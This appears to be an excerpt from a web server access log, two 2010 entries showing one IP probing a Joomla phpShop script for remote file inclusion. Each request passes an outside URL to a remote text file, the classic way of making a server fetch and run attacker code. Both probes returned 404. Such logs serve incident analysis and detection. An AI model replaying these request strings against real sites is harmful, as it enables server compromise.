66.103.128.44 - - [07/Feb/2010:09:37:17 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:09:37:17 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
